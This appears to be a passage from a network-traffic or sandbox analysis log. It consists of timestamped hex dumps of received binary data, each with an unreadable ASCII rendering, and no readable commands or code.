3e 0d 90 95 96 1f ab 1d 1c 53 1a ae e1 fa a1 07 f0 0c f9 da 0b fc 1e 76 1a 2b 65 57 b4 56 21 f6 f1 35 7e c4 f7 fa 67 bb 45 6f 6f 37 3a b3 7b 78 ab ff c6 6f b3 0b 31 0c e6 9d b9 ea 54 c6 01 6a dd 80 b0 24
                                                                                      Data Ascii: DK%1h6m&n5 Yoj6SZB0%9iCaVc&+C`jhucQShTBe$)x5CikVE>25G8IFlM!;v3z\o>Sv+eWV!5~gEoo7:{xo1Tj$
                                                                                      2023-08-04 16:48:39 UTC1190INData Raw: fa b6 e4 38 f1 fa 85 c8 91 8e 9f 46 1c a7 22 fc b7 f4 90 fd 42 27 15 cf 73 ef 8a 2c 9f f0 0a 36 9a 93 31 6e 94 a5 fc 77 e7 9f a3 8b 54 ba 5b 74 2b 48 92 e8 3d 00 b9 bd 6a 01 47 2d ae f5 b3 61 37 f9 6f 27 f4 89 91 f9 a5 cb b7 ef dd 0f 36 29 28 6d 0c f5 41 be d6 2d 05 ee ab 58 9d 32 3d bc bb 93 43 03 4f 44 56 48 09 db ec 4d e0 b1 eb ed 93 76 1b e4 3b c6 8e 57 fb 6c 40 ba 69 e8 ca 4e 30 81 2f 8d 71 17 65 d9 b6 49 59 e8 23 76 a6 7b 67 0a cf 37 95 0f de 8f 23 aa 06 23 28 18 f2 c8 38 31 7f 23 f1 10 7d 0c b2 2d 9b fe 63 27 d4 e0 79 ac 95 7f 89 bf 70 74 c4 d6 7a 19 a1 41 bc d4 92 8d 3f c8 af ce 2a e3 15 e4 17 49 eb c1 5a 34 08 aa a7 32 33 91 11 4f 78 21 b3 6b 92 64 d9 3b 02 1a c8 1e b3 a6 79 cf f3 ea cb 90 a9 c9 43 1b d8 c5 03 57 01 e0 93 6c fa b5 17 64 46 85 bc
                                                                                      Data Ascii: 8F"B's,61nwT[t+H=jG-a7o'6)(mA-X2=CODVHMv;Wl@iN0/qeIY#v{g7##(81#}-c'yptzA?*IZ423Ox!kd;yCWldF
                                                                                      2023-08-04 16:48:39 UTC1194INData Raw: 7d f9 b7 5f 7f 5c 43 de 53 68 3c 6d d9 80 4c 77 34 ed b5 d5 a7 e6 13 d4 59 eb 4c 96 10 c3 df 95 1d ae d5 ca 3e e3 35 dc c0 dd 29 c3 07 c8 11 4b 67 2b 74 d1 9b 40 22 ad 20 05 dc f2 4e 27 f0 fb 2d b4 00 bb f6 af 25 50 85 e0 14 9b 2d 1a db c6 6e 22 78 55 68 a4 33 93 90 54 b1 ec da ba aa bb 36 92 73 1e fa e3 82 94 4a 6f 50 48 3b 1c dd 71 f4 67 46 32 6b 4d 0a 9c 34 ae 12 69 4d 4d 28 a4 d0 41 87 6b d7 92 51 91 25 55 9c a9 bb 8b e4 c0 db 12 c1 6d 0e bb 21 b2 e6 64 1d 9e ae 9f cf f2 36 24 d2 4a 64 c6 e4 a5 5f be 37 29 cf 91 02 82 9c ac 5b 04 65 fe d3 ea 2e 89 49 18 f5 26 a1 72 50 48 0a d8 ee 27 22 16 78 11 8b b5 fc 70 a2 d8 75 b7 6d 12 8c 93 bd d8 01 1f 89 bc 2d ff 47 15 9c e0 5c 9d 4b 78 c4 85 17 21 37 a6 11 d3 9f 36 0d b3 a9 84 d8 f2 5f d5 2d 49 c2 c5 a9 6d eb
                                                                                      Data Ascii: }_\CSh<mLw4YL>5)Kg+t@" N'-%P-n"xUh3T6sJoPH;qgF2kM4iMM(AkQ%Um!d6$Jd_7)[e.I&rPH'"xpum-G\Kx!76_-Im
                                                                                      2023-08-04 16:48:39 UTC1198INData Raw: 8c 6b 11 50 72 35 bc fb 23 1a 37 0a 1c ef 0d ee a2 59 72 e8 57 01 08 5b 20 ab 21 05 5c 56 1f e4 c6 aa db 26 71 84 1f 2a c7 e3 02 bb f0 06 33 66 5f c3 25 ad 96 7e 8f cb 1d e4 fa 8e 0d 85 bb cc 33 5b 29 20 77 a0 3e ab 42 09 be a1 be 47 df 62 04 ce 77 b4 0d 3c 6d b3 75 82 ae 0a 0a 0a 95 c7 53 27 55 de 25 7f 89 a6 a5 99 68 fc 91 5e fc e7 4d d3 e8 c4 4a da 22 92 22 96 ed 85 8f 1b c0 0a a8 b1 0f 1a 99 78 66 66 95 93 5f d2 63 5e 18 98 9a 77 40 5a b3 be e0 4c 3d fd f1 0a 39 54 be 85 e4 71 2f 9b 4a eb 38 62 48 dd fe e9 3f 0f 6d 4b 90 a4 07 04 04 b8 62 72 30 e9 2a 60 8e 7d 1b e1 c2 57 99 ba 7d 18 f8 5d 86 a7 1b 1c 20 52 27 5f 7f c0 0f ae 4f 58 fb bc 4b d8 98 0e 94 1c b1 f2 e5 d4 da 3f df fe 29 ec fa 39 47 90 88 32 fc a8 64 e3 82 26 01 8c ae c0 66 db 47 d0 0f 4f 98
                                                                                      Data Ascii: kPr5#7YrW[ !\V&q*3f_%~3[) w>BGbw<muS'U%h^MJ""xff_c^w@ZL=9Tq/J8bH?mKbr0*`}W}] R'_OXK?)9G2d&fGO
                                                                                      2023-08-04 16:48:39 UTC1202INData Raw: 1e 41 3a 38 c9 ac 82 74 8c 53 b6 62 f0 9a ed 34 57 2d a0 f9 c5 d9 16 a6 ea 18 8f 89 6f 24 86 55 51 9c 62 d5 3e 44 b9 95 c4 94 72 f5 84 e9 d1 53 4f 05 84 cf bb 50 80 f4 e3 8f e8 2b 6b 58 d1 29 b7 ce b8 0a fb 2c 38 90 9a 7a 2c 6c 5f 6b b0 39 ae 6e bb 35 ca e1 fa 4f 83 1a c2 bc c6 0b 1d cf 33 9f 9f 2a 80 3e 76 07 60 ee 95 c8 d0 4f fa d8 ca b8 d1 50 74 a9 e8 20 3f f1 ea 4e d7 8f 92 f3 7d 08 a7 59 e5 44 aa f4 6f 1d b7 6f 24 5f af f5 3e 03 18 4f a1 4a 45 17 aa 03 e5 10 cf 2c 5f 9b 60 d5 57 ce 7b 26 ea a9 a2 aa 8d 3e 15 18 ad 28 c6 42 d9 ff 6b 66 c3 58 8c 18 27 bf 00 87 f9 84 dd da e2 8d c5 57 53 3c ae 89 29 41 39 b0 f3 a4 5c f9 a4 f1 5a bf 1f 2c e2 2b b0 84 17 74 d3 75 44 1b b2 1f d0 49 d7 e9 d2 06 c1 f3 cf b8 9f 5f fd c6 29 f5 44 09 2b 46 c9 0f 67 fd 2e 59 5b
                                                                                      Data Ascii: A:8tSb4W-o$UQb>DrSOP+kX),8z,l_k9n5O3*>v`OPt ?N}YDoo$_>OJE,_`W{&>(BkfX'WS<)A9\Z,+tuDI_)D+Fg.Y[
                                                                                      2023-08-04 16:48:39 UTC1206INData Raw: 76 9d fd ce 35 9c 58 d6 ee 6a 67 cf f1 9e 4e 5f 7d b5 e3 55 bc 4e 15 11 b3 53 52 51 b9 24 ad 43 4f 99 32 e3 83 ff 60 b5 f8 ac 17 2d 62 bb 6e 25 e1 8f 22 29 65 08 1c 62 cb 6f 9e 15 c7 89 a0 10 7a 6c 13 10 88 2b 81 70 17 9b 84 04 2c 94 ab d7 7b d2 c7 81 f6 e2 85 24 7c 4f 7d 61 d1 de 7e 0b ee 6b 04 bd f2 1d 76 48 e4 29 48 5d 1e 83 9b a8 47 dc 8b c3 02 3c e2 92 6c d3 e8 68 3f 1e 6e 7d 41 ca f4 8f 67 0d 1d 23 22 22 46 1c 42 78 be b4 69 7c a1 f4 99 67 22 f8 0f 91 94 6b a1 4c e0 cd 30 17 44 66 da c4 10 54 75 cf 3b f7 fc aa 31 ab 1e 8c 5d 77 e0 89 11 64 ea 81 37 2a 78 9c 30 ad 87 4b 8a b4 a2 5a 25 84 58 56 59 9b 03 da 49 82 fc 27 23 4e 6d 25 c0 9c 2f 87 d3 1b 41 07 3d 93 4f 7e af ba e9 42 f7 88 11 7c b8 04 f7 bd 52 dc 5d f0 cd 94 40 f8 92 85 26 16 49 b9 ba 15 37
                                                                                      Data Ascii: v5XjgN_}UNSRQ$CO2`-bn%")ebozl+p,{$|O}a~kvH)H]G<lh?n}Ag#""FBxi|g"kL0DfTu;1]wd7*x0KZ%XVYI'#Nm%/A=O~B|R]@&I7
                                                                                      2023-08-04 16:48:39 UTC1210INData Raw: c9 ce 6b a8 0a f9 78 8b 9e 38 c4 8e 0d 45 21 b6 8d 63 ff 75 1d bf 8d 6f d3 41 1c ac ac 91 b8 ad 36 60 da ab 26 09 3d 03 4b c0 c1 41 d4 34 29 db 9e 56 92 91 4d fa ea 4a fb 5a 91 f2 f7 a0 1b da 00 84 1f 10 ea 76 1f 30 ce 15 6a c8 09 20 11 62 23 e2 df b2 dd ec 83 07 a3 cc aa a8 45 a4 29 6b 89 2c b4 5c d3 c3 24 4c 95 2a 74 be 79 8c af 25 b7 30 f5 5d 21 80 13 c6 66 db c3 c7 87 15 ee e3 bd 5d 08 92 65 61 c3 92 6f 44 e8 6d 98 74 55 88 c4 5c 6b 60 b4 74 71 41 8e b7 4f 75 78 8c 76 d3 90 a9 76 3d 92 43 39 1c 03 db c9 82 7d 3d df 3a 26 38 61 6d 77 81 17 4b b0 b7 c3 37 dd 99 75 5e e6 c8 17 43 a3 f8 12 1a 17 cd ed 76 86 fe 66 4e 32 2c 0a 69 63 93 ec 1c d8 68 34 3f 8c 15 d0 5b 6e 90 fd 15 b4 f2 2d 11 6d a5 8b 21 db 33 66 05 ff 1b 73 8d 33 12 d9 5f 81 16 96 fa 3d 68 6e
                                                                                      Data Ascii: kx8E!cuoA6`&=KA4)VMJZv0j b#E)k,\$L*ty%0]!f]eaoDmtU\k`tqAOuxvv=C9}=:&8amwK7u^CvfN2,ich4?[n-m!3fs3_=hn
                                                                                      2023-08-04 16:48:39 UTC1214INData Raw: 01 af 50 e9 4f 94 15 b0 44 ec 40 7f c8 ad 08 82 a9 ee 75 9b d3 da b0 d2 1e 70 09 3e 6a d6 b6 a6 44 9d 79 69 94 e4 11 a3 19 3b 0c 2d e7 ef e9 a8 66 3c 26 be e1 1f 8d fc 9c 7b df 37 91 9b 39 9b c4 a5 83 a8 cd 7f 5c 93 37 55 4f 0e 65 d1 3d c5 39 7d 03 16 24 bf a7 ef ae 53 5e 13 8f 97 a1 69 dd b5 20 e9 0f c1 ab f4 e6 80 3a 64 f8 49 c2 01 dd 8a 11 3e 63 16 3b 37 4f ce ab 8b 03 99 43 da e5 a2 7d a6 11 f6 6a f5 98 84 1f 49 f2 e2 41 e1 a6 60 09 da 4e 4a 16 e1 3c 66 9e f0 3d c9 5e 14 f0 fe b1 b7 11 41 ab 87 c2 2a 5f ff 5b 65 54 8b ab 7c 2d 25 ab 2f 31 5d 6d 23 ee bb 5b c4 21 d1 41 7c b3 08 05 9c 30 0f b0 1f 9f 3f 91 b1 9b 9b 2a 33 0b 45 9f c2 01 ca ca ed 41 a4 e9 54 d7 a7 df e9 49 d6 13 3a dd d2 fe 9c 8d bd ac 32 24 ef 98 87 d6 72 cc 11 45 7e cd 83 6f 59 b9 4d da
                                                                                      Data Ascii: POD@up>jDyi;-f<&{79\7UOe=9}$S^i :dI>c;7OC}jIA`NJ<f=^A*_[eT|-%/1]m#[!A|0?*3EATI:2$rE~oYM
                                                                                      2023-08-04 16:48:39 UTC1218INData Raw: d7 09 4e 61 c2 56 19 b3 80 95 8d d3 db c7 96 df 7d 99 0f 42 29 48 c2 0b cf fe 68 8a 79 14 97 8e 98 2f 02 02 a8 88 2a 2c 27 39 fa 68 34 64 04 75 a1 06 9f c5 9d 13 18 13 31 fc 3d 09 42 ca 8e f6 5c 10 28 a0 d4 91 16 b6 37 d7 e2 71 d8 e7 fe 1a da 97 99 86 14 10 95 14 c8 e1 48 1e 79 f3 36 ca e3 41 c0 63 8d 16 b2 ba 38 1d d6 e4 a1 06 26 72 2f d4 56 29 d5 7a 20 f8 e7 90 6e a2 8f 66 1c e4 29 0f 91 ca 90 d6 b2 8d 9c e4 8c 01 e0 fb e1 3b c0 f3 65 a8 1f e1 d3 a3 c1 08 b8 35 52 a8 cc 6a 64 44 36 bb b7 a9 22 39 37 70 df 28 63 b0 46 a4 17 fe d3 7e ec a3 1f 19 f1 13 7b 20 2e 73 90 26 76 72 55 2f 6a 0f d5 b4 0d 5a 79 74 2b 80 36 b4 12 12 48 1b 91 50 0f e2 0e 49 1e c4 6d bc cb 80 f5 af cc 2a f1 16 e4 e6 7e c8 be d6 cc 9b f2 ff c0 b0 90 a1 34 88 5d 3e 5b a9 7d 9c 09 f6 29
                                                                                      Data Ascii: NaV}B)Hhy/*,'9h4du1=B\(7qHy6Ac8&r/V)z nf);e5RjdD6"97p(cF~{ .s&vrU/jZyt+6HPIm*~4]>[})
                                                                                      2023-08-04 16:48:39 UTC1222INData Raw: 29 d0 89 b8 30 bf 3c 02 7c c6 b4 53 87 f9 e0 07 11 a0 b2 a2 de 23 10 bc a6 26 1b c1 08 86 a8 50 41 6e 77 76 55 e6 d8 d3 c9 dd 80 73 99 6d dc 01 90 92 c9 ea 3f 6e 51 66 75 7d fc 20 f1 55 bd ba 78 df 9f a4 f9 0d f9 a3 e3 75 43 00 5a a0 9a 84 ca d7 27 bc 2d 6f 27 a8 3d 38 5c 63 83 8e f7 71 71 46 ba b0 f5 4e 10 65 6f 5a ba 7e 6e 7f a6 07 94 1d 8a ce d9 08 be 09 d9 71 2c 52 bf 82 b6 bf 95 9d ce 62 45 67 3a 7f 92 e3 09 c6 a6 d7 ee 1a 99 12 a0 4a 54 99 73 74 39 74 b0 48 90 40 0b 32 fe ab ca b5 1e c2 34 ff 51 9a 2d 24 e0 89 66 d0 e0 d2 13 94 a2 b0 d5 1d 96 65 a3 5e ce ed d6 d2 81 87 5f ea c5 4c 95 10 e4 30 97 00 eb b7 1f 80 d3 c4 55 ce c3 06 90 a4 f3 df 77 f6 d6 58 59 88 a8 ef 67 5a 90 45 a0 64 04 f8 05 da ac 2e 0f db 9a 10 a8 1f ab 13 17 00 f9 ab 94 3c 2b 72 5f
                                                                                      Data Ascii: )0<|S#&PAnwvUsm?nQfu} UxuCZ'-o'=8\cqqFNeoZ~nq,RbEg:JTst9tH@24Q-$fe^_L0UwXYgZEd.<+r_
                                                                                      2023-08-04 16:48:39 UTC1226INData Raw: 28 0e 79 e7 d5 0a 5a 76 67 1d 52 b4 0b 61 8e 46 d4 0b a2 49 4e 53 8b 14 bb 05 95 7a 31 56 29 63 17 0b ac 17 1f 9a 24 19 99 27 cf cb 2d bd 1e c7 9a 7e c8 3d 4b 7a d1 a0 2c ce f7 19 47 1b 97 7e a5 2e 9b f1 6f 25 92 be 46 55 e8 75 0f 6f 20 c7 a2 a6 37 ac cd 75 51 33 51 4a 5e 0b 11 3a ca 7d 34 5e 77 81 7e 2b 84 8e d6 11 46 82 50 3d 97 50 00 07 47 20 d2 1a 85 d2 e6 8d ee 5a f1 c6 02 4e ea 05 2c f7 70 2e 3c 53 71 d7 2c 10 11 6f 2a 05 b0 f4 f0 ef 86 d0 e8 02 3a fc 07 e2 e7 ac 80 79 db 5e 48 1e db 63 46 37 ff 93 23 f1 2c 02 48 7c 41 ed 08 ba 86 7d 73 30 a0 61 9e 80 f2 fb 7f a9 b0 fd 49 b2 4f c8 11 d0 8c 9d 70 6b 0a 6e ab 72 f1 b5 b4 b2 49 03 18 00 05 fd de db 02 cd 92 f9 02 2f 2c 16 3c 68 b3 2a ad d0 99 2d 9f 37 d2 ae 25 01 44 65 91 61 00 59 c5 b3 fc 5a 7f 88 6e
                                                                                      Data Ascii: (yZvgRaFINSz1V)c$'-~=Kz,G~.o%FUuo 7uQ3QJ^:}4^w~+FP=PG ZN,p.<Sq,o*:y^HcF7#,H|A}s0aIOpknrI/,<h*-7%DeaYZn
                                                                                      2023-08-04 16:48:39 UTC1230INData Raw: 73 c9 b4 3b 8e 57 4b 18 5c 43 30 29 63 be a3 02 0c 0b 81 40 e1 96 7c 84 73 68 d4 fa 72 ec 95 b8 66 a1 9e 93 81 f2 bc 80 35 00 f4 bf 0d 7f 1a 3c 86 ab 81 66 b8 9a 77 13 90 49 54 4e 97 41 7b 5c 4c 14 4e 24 d0 7c 93 dd 57 9f 8f 76 cf 67 66 9e 3f 4f ba 4f d8 88 11 70 8c f5 88 47 c4 00 65 9b 95 53 24 0d 5a b3 e1 10 f6 99 cc 98 e8 59 12 51 f2 75 32 10 57 10 32 26 45 69 d2 07 37 6c 1b 02 55 e3 f2 6b a8 d7 8a 56 bf 10 ac c8 46 2e 5c 8f 84 52 dc 18 26 56 ac 91 e1 86 7f e2 d6 3c 97 de 05 d8 3e a9 f0 29 82 48 01 42 ee 49 75 ef f7 98 e2 87 81 09 70 a7 8e 45 b1 c5 16 55 d7 5c f4 54 f6 16 1d 6b ab 00 10 36 4e 3f 92 f3 a1 34 13 8b 66 23 bd 7a 45 60 6d ac c2 f3 1b 4f 6a b6 fe 47 ea c7 49 1f 4b a2 92 6d 61 d3 44 fa 0d 29 b5 a3 4f 80 82 5e e0 f9 c3 ae f9 24 04 5e 41 5e 49
                                                                                      Data Ascii: s;WK\C0)c@|shrf5<fwITNA{\LN$|Wvgf?OOpGeS$ZYQu2W2&Ei7lUkVF.\R&V<>)HBIupEU\Tk6N?4f#zE`mOjGIKmaD)O^$^A^I
                                                                                      2023-08-04 16:48:39 UTC1234INData Raw: 5c 65 43 87 fc ef 14 c5 28 20 19 bf 89 24 cc 20 ab a8 ed 6b 57 13 4a 05 af 03 b9 8d 0f 16 27 4c 0d d5 97 cf 41 ee 14 ef 2e e6 ab 88 d4 d5 45 d5 c0 13 67 ee d5 81 73 eb c3 be 9b ff 00 60 0f ec 5e 94 70 54 a7 12 00 af 01 82 9e 3a e3 40 6e e3 d0 13 bd af c1 fa 82 28 9d 4f c3 50 b5 b8 35 af 3e 23 0f 1e b8 a5 44 15 e3 2c 50 e7 7e 96 ab 2b 50 2f 3c 65 8e 04 a9 86 c1 3d 17 3f af 7c b5 98 0a b3 75 a6 cf 3a f8 f7 06 aa 5e c8 b9 48 38 8d 92 4f a4 f9 ca 6d 1e 6c 73 01 0c 20 03 c9 8e ac 56 f0 51 2b 52 e6 55 f7 40 06 5d ba 0f 4f 86 60 56 a2 06 7f fd 82 3e 0d 81 27 55 14 b8 75 03 ce a7 6d 27 d9 02 7e 93 a4 33 8b 3e fd 06 6c 50 1c b7 b1 89 04 40 23 89 c3 b1 42 a6 f1 de 4d 0d c5 69 62 70 a6 a5 f2 e4 ed b2 a0 04 99 43 71 6e 83 ad fd aa 81 34 12 5d 70 fd 52 b2 8b e1 bc 89
                                                                                      Data Ascii: \eC( $ kWJ'LA.Egs`^pT:@n(OP5>#D,P~+P/<e=?|u:^H8Omls VQ+RU@]O`V>'Uum'~3>lP@#BMibpCqn4]pR
                                                                                      2023-08-04 16:48:39 UTC1238INData Raw: d5 ab ce a8 78 5d d8 5d 7e ae 0b 51 de d5 d7 3f 88 9e d9 02 87 cb ab 44 69 73 bd 06 cc b4 84 2c 4a ba 28 c4 51 40 94 bc e7 70 6b 03 d8 a4 25 0b 29 1a d5 b9 c8 87 4d 2f dc 24 59 2c 1b 25 7b fd a0 26 b9 d4 93 55 f1 53 42 57 32 d3 4b 43 8a 3a 99 21 11 f5 ae c8 24 9d c9 5e 51 b9 c2 88 38 d7 24 71 7b aa f7 13 60 4e e7 86 1b fe 81 9c 86 22 ff f8 f4 7f dc 6a a7 00 a9 44 fc 19 12 22 8b 41 99 05 6c 25 53 bd 06 dd 33 cb c5 c0 c1 bc 8c 30 1f 80 a8 87 73 55 0b 08 eb b6 b5 ce d7 a8 25 54 e9 3b f1 b3 cd b3 85 76 4b d8 99 72 6d a5 35 e9 21 a0 8d 9c 67 bb 4d 4e 9f d1 1e 4a e6 8a ed 6b 73 52 ca ff f0 da 00 23 ff e7 e1 77 59 6e f2 50 85 6c 5a 8f 64 07 69 a7 17 66 f5 09 91 6d ab 69 fc d0 a6 59 40 32 ba 30 e9 5b 5e 12 aa 13 33 5a e2 89 23 ea 98 0d 7c 7c 38 b8 9a 5b 97 53 d4
                                                                                      Data Ascii: x]]~Q?Dis,J(Q@pk%)M/$Y,%{&USBW2KC:!$^Q8$q{`N"jD"Al%S30sU%T;vKrm5!gMNJksR#wYnPlZdifmiY@20[^3Z#||8[S
                                                                                      2023-08-04 16:48:39 UTC1242INData Raw: 58 c1 b7 5a 48 66 d7 a7 08 04 29 c6 0d c0 a8 0d 78 1f 15 36 e1 61 e7 ee b7 03 2a a8 58 19 c0 aa b9 60 2c 4b 4a 08 73 0b 2b 12 dc ac 31 89 b7 5c 71 08 56 9f 55 1f c6 b1 70 7c fb 07 e1 fe a8 06 8c 9c ae e8 7d 19 7e ee b2 71 94 7a 86 47 bd ef b6 17 0c 9c 42 61 ef 4b 51 05 94 91 25 d5 67 85 d6 62 8f 1a 2b e3 62 c4 1a c0 34 6c 83 14 7e 0a 71 59 84 33 b4 85 e3 62 8b 17 f8 3a cd ca 9e 57 79 d9 55 0f b2 66 45 b5 e3 d9 b7 f2 31 cc 85 9d da 20 bd 6f 3b 8d dd 5b 61 bc 6b 3a 57 7a c9 7f 12 24 e5 01 3c cf bc 27 09 d4 62 cd 07 d0 42 14 19 d9 a7 69 b0 d1 03 06 51 72 73 b0 bf 4e f9 86 04 39 17 a7 5a 3b df 67 5e 97 f9 25 17 24 d3 23 18 7e 26 96 88 0d e8 2e f5 b4 22 6e c7 0d 74 cc 4f b1 23 25 a5 bf d7 25 67 fe 9a a7 70 6d 3b ba cc 64 c3 79 9d b9 b8 64 5d 6a 68 d2 bb 03 6e
                                                                                      Data Ascii: XZHf)x6a*X`,KJs+1\qVUp|}~qzGBaKQ%gb+b4l~qY3b:WyUfE1 o;[ak:Wz$<'bBiQrsN9Z;g^%$#~&."ntO#%%gpm;dyd]jhn
                                                                                      2023-08-04 16:48:39 UTC1246INData Raw: 9d ed 37 5f 37 a4 d8 bb 45 f9 21 19 fa 8b 48 02 76 1e af dc 14 79 90 7c a6 65 76 9e 82 78 94 7e d7 c8 69 6a 56 9e 8a 28 d3 ff 63 d2 a2 0e 4a 76 bd 8a 2b 78 df e1 17 07 48 c7 f9 e6 93 84 ac df 50 63 1c 94 b5 20 07 a2 c8 75 c8 6f 2d 49 3a 00 32 82 e9 e2 40 aa 81 21 d8 28 f9 01 42 31 ef cd 2c 66 4e 6a 81 c2 1b 0f ac 04 13 9c 72 8f 84 00 e5 cd b3 9a 97 3c b7 c9 ca bb fd 39 9a 1b 66 5d 90 0a 65 0b 61 4c ef 84 ee f2 d1 e2 df ca 7a 9b 50 cd 4a 33 a9 37 8d 17 75 57 83 03 cc 41 0c 21 28 cd 54 5c 3c 4b 03 2b 5e 0e 4f b4 4f 4b 96 d1 ab 1b 58 e9 76 7e fc 93 fc a7 f4 f3 e9 d0 ea 6e 78 cd 12 06 d6 0c 57 69 51 2e d2 fe 04 69 37 7c 5a a5 88 b6 43 02 fe 6d 4f e8 02 92 18 14 2e bc a1 a1 bb 34 04 9d 02 1f 99 03 15 49 ca 7b 1d 54 e3 f9 45 0b 69 54 cb 13 59 df 86 90 85 81 3e
                                                                                      Data Ascii: 7_7E!Hvy|evx~ijV(cJv+xHPc uo-I:2@!(B1,fNjr<9f]eaLzPJ37uWA!(T\<K+^OOKXv~nxWiQ.i7|ZCmO.4I{TEiTY>
                                                                                      2023-08-04 16:48:39 UTC1250INData Raw: ee 61 e4 94 dd 5f d0 29 22 2c a3 c3 d7 e7 ee 70 91 e0 b7 da cc 97 43 39 41 a0 57 d0 81 fc b4 b4 58 31 66 4f 25 fe fd f3 80 26 61 f4 97 6a fe a6 05 a5 11 71 bf 39 ae 15 b3 5c b1 7c b3 95 eb 64 00 22 40 12 05 b7 a1 1f 00 17 6e 19 70 5d 62 3b 66 07 b9 55 67 7b af 4d 16 e5 34 04 b4 0d 5c c3 71 ae 90 85 0d a1 ce 3f 59 ef d8 b7 cb 08 b3 3b ac e1 82 d1 f9 20 7c b3 9e 71 40 25 53 d2 1d 2a 20 79 d6 f1 f8 29 3d c9 fa 83 c0 06 6a 5f 8f c8 54 5c ff ba 73 bd 9a 9b 9d 12 17 4e 24 36 8e 26 df a6 dd 8b e4 9a f8 3f 96 9f 65 0b e2 5e 72 40 42 8e bb 84 12 e4 ff 7d 11 b1 ed 0b 13 64 39 a6 b0 04 41 b9 af 43 30 77 e6 b1 19 7f b1 e1 ff 2c 39 f9 82 78 e1 4f 82 a8 db 6a 34 70 9a 28 0e e8 64 d5 da 52 34 dc 98 44 c4 cb 41 7f 75 83 ef c8 9c 6a 0e 9c 16 e8 e2 c9 64 a7 07 24 0a ce 93
                                                                                      Data Ascii: a_)",pC9AWX1fO%&ajq9\|d"@np]b;fUg{M4\q?Y; |q@%S* y)=j_T\sN$6&?e^r@B}d9AC0w,9xOj4p(dR4DAujd$
                                                                                      2023-08-04 16:48:39 UTC1254INData Raw: 3f 95 79 b6 ce 40 2c 8f b8 f5 5f 32 6f 97 63 b6 a0 55 3d 65 94 29 ed b3 61 b8 fd 68 6c 6e 33 6f 38 ec e9 73 91 27 0a 8f 3d ef be cc 2d f9 e2 2b 66 3b 0e 0e 9b 9b 65 b5 00 e3 a5 f6 d4 39 b7 0e 1e aa 98 4f 78 a9 13 3e 50 ec 20 03 7c 71 31 cf 4f 52 21 01 9c 4a aa 1b 24 97 4f 27 14 94 24 00 5d 05 a7 59 e6 3e 0b b5 cd 2f df b2 b4 82 0b e5 bf da f2 e8 90 76 f7 c0 cc 51 0b 2c 30 c4 a7 5f 6a 7e 05 6e ec 4f a1 30 2c b7 b4 b0 df 19 e4 9d ac 92 6a b2 4e 2d dd 81 43 29 f8 4c e1 e9 6f 5c a0 81 17 fa 9c 45 0b e6 a4 73 bb fa 70 b9 0c 0d 47 54 e3 2a c0 e3 6b d5 2e 6e 07 b3 81 61 4f 19 7e b1 f2 04 33 c2 69 e9 15 4e 1f 93 a6 79 07 33 7d f1 45 23 9e 3d 22 48 e1 6d fb c4 df 10 b4 5b 4e bc 36 e8 43 b9 cd 21 91 c3 3a 49 82 48 ef e1 f2 b3 b4 6e ac fa bc ef d3 af b2 c9 cf 49 50
                                                                                      Data Ascii: ?y@,_2ocU=e)ahln3o8s'=-+f;e9Ox>P |q1OR!J$O'$]Y>/vQ,0_j~nO0,jN-C)Lo\EspGT*k.naO~3iNy3}E#="Hm[N6C!:IHnIP
                                                                                      2023-08-04 16:48:39 UTC1258INData Raw: 70 d5 d7 ce 07 c5 25 b9 28 ef 97 60 ad 20 0a 99 b7 1f 9e 57 35 10 46 4b 90 8d 78 b6 09 00 7e 05 1e 2c 1e fd 83 ff 17 58 24 f4 67 7f e8 e9 df 6f 09 1a f8 c4 0f 1f 46 26 f1 15 c1 98 b9 7a 5b 38 7a 8f 0a 7a e1 eb eb 41 35 e8 46 4e d4 b5 77 0a b4 98 50 f0 e6 82 a7 a0 b7 88 79 d5 0a 30 b6 c3 a7 af 47 90 dd be d8 98 fd ca cf c8 8b f4 0f 9f a5 d2 60 45 3a 4a dc 40 49 c8 52 04 4b 37 15 67 15 b4 07 08 bd 81 9b 3e cb 28 b1 2e 2c 8e 69 3d 36 e1 9d bc dc 77 2e c7 1c f1 c6 60 97 db ea 37 6d 03 ad 27 28 31 4c e1 a6 56 94 7c 9a 74 01 54 02 1e c7 f5 c1 bf e5 dc 55 0c 9f 4e 56 58 1f 0d 5c 21 ea 38 ef 92 da af d3 46 92 83 db 1a a4 65 48 60 2e 8a 70 1f 19 be 94 8c 8b b0 36 0c 17 0b 67 cf d9 fa a8 46 03 95 ae ac 99 db da 9a d0 3f 6e 64 2a 9b f2 4c 16 f4 cd 4a 5d 62 75 17 5d
                                                                                      Data Ascii: p%(` W5FKx~,X$goF&z[8zzA5FNwPy0G`E:J@IRK7g>(.,i=6w.`7m'(1LV|tTUNVX\!8FeH`.p6gF?nd*LJ]bu]
                                                                                      2023-08-04 16:48:39 UTC1262INData Raw: f5 34 c4 b3 43 92 9c 8d 4f 5a a6 16 35 17 51 25 fd 35 53 c3 09 5a 09 cd 94 f0 f6 ae 4a 4e 74 c2 e1 20 36 12 ab 60 d3 59 e5 aa 42 6c 11 87 af a9 d7 12 9a df 4d e7 dd 9c 27 5b 43 3d 5e bf 6a 81 0e 19 a4 83 97 06 80 7a de d5 5a 01 1e 8d b9 24 47 13 5b 74 fe 97 d1 c8 fe 3c b8 15 67 98 53 f9 7d 49 e5 a5 79 8e 6c ee e2 3d a6 60 b3 77 b9 5e ea ee 47 1b 43 5e 96 dc 30 42 27 25 b6 49 68 39 10 6a 9b f9 f1 7e be 91 26 0c 50 2f a0 69 42 9f b4 34 ba 93 a8 37 43 f9 c6 5e ab c6 ec a9 f6 bc 43 d7 6c d3 a0 b0 24 18 bf 92 52 31 3d 7f 6e f7 29 0a 09 7c 36 21 da 62 11 e6 32 9e d4 43 81 18 50 48 be a6 60 c3 98 2f ff cc c4 9d 67 8f df 7d 32 87 57 24 e8 51 e5 93 1c f4 11 1d 88 10 31 62 f6 5d 4d 98 e7 5d c7 43 38 47 84 a4 85 88 ef 22 57 2a b5 e7 5b 61 0e be c6 bc 12 e1 d7 b0 3d
                                                                                      Data Ascii: 4COZ5Q%5SZJNt 6`YBlM'[C=^jzZ$G[t<gS}Iyl=`w^GC^0B'%Ih9j~&P/iB47C^Cl$R1=n)|6!b2CPH`/g}2W$Q1b]M]C8G"W*[a=
